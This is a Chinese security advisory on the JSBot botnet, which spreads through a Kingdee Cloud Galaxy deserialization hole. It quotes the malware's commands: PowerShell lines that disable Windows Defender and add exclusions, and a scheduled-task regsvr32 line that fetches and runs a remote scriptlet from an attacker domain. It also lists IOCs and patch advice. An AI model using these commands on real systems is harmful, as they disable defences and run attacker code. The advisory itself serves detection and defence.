恶意文件名称:JSBot
威胁类型:僵尸网络
简单描述:JSBot是一种利用多种漏洞,善于使用无文件方式加载恶意代码的新型僵尸网络病毒,其具备文件下载、上传、对外DDoS、挖矿、盗取密码等功能,对主机、用户资产危害极大。
事件描述
在近期的安全运营过程中,我们发现JSBot僵尸网络病毒使用某蝶云星空反序列化命令执行漏洞在办公系统内进行传播。
JSBot通过漏洞进入办公系统后,首先会执行一段远程PowerShell代码。
解密后的代码如下。
通过Set-MpPreference -DisableRealtimeMonitoring $true 指令关闭Windows defender的实时文件扫描。
通过Add-MpPreference -ExclusionPath命令将下列目录加入Windows Defender的白名单中。
"C:ProgramDataMicrosoftNetworkConnections"
"C:ProgramDataMicrosoftNetworkDownloader"
"C:ProgramDataMicrosoftWindowsWER"
"C:ProgramDataMicrosoftWindowsWER"
"C:ProgramDataMicrosoftWindowsCaches"
"C:UsersAdministratorAppDataLocalTemp"再创建多个计划任务,执行远程恶意DLL。
Start -Sleep -Seconds 3 SChTASks /create
/tn('MicrosoftWindowsMUILGRemove')
/tr('regsvr32 /u /s /i:http://cat.xiaoshabi.nl/netstat.xslscrobj.dll')
/sconstart /ru('System')/F最后通过IEX执行的远程PowerShell代码networks.ps1文件和之前其他厂商披露的基本一致,使用了相同的混淆手法。解密后为该病毒僵尸网络相关模块。
IOC
IP
47[.]101[.]133[.]228URL
*.dashabi[.]in
*.dashabi[.]nl
*.xiaojiji[.]nl
*.xiaoshabi[.]nl
safe[.]lxb[.]monster解决方案
漏洞处置建议
官方已经发布最新补丁修改该漏洞,请受影响的用户及时更新最新补丁,参考链接:
https://vip.kingdee.com/article/388994085484889344?productLineId=1&isKnowledge=2病毒处置建议
1. 建议封堵上述攻击IP和C2地址。
2. 建议及时更新系统和软件补丁,以修复可能存在的漏洞,减少系统易受攻击的风险。
3. 建议梳理资产是否为https协议加密情况,及时在使用的安全设备,比如探针、防火墙,进行解密操作,进行流量监控和攻击动作拦截。
参考链接: https://mp.weixin.qq.com/s/iYieCoiK161jv1SyGTJXWw
图片来源网络目标可联系删除
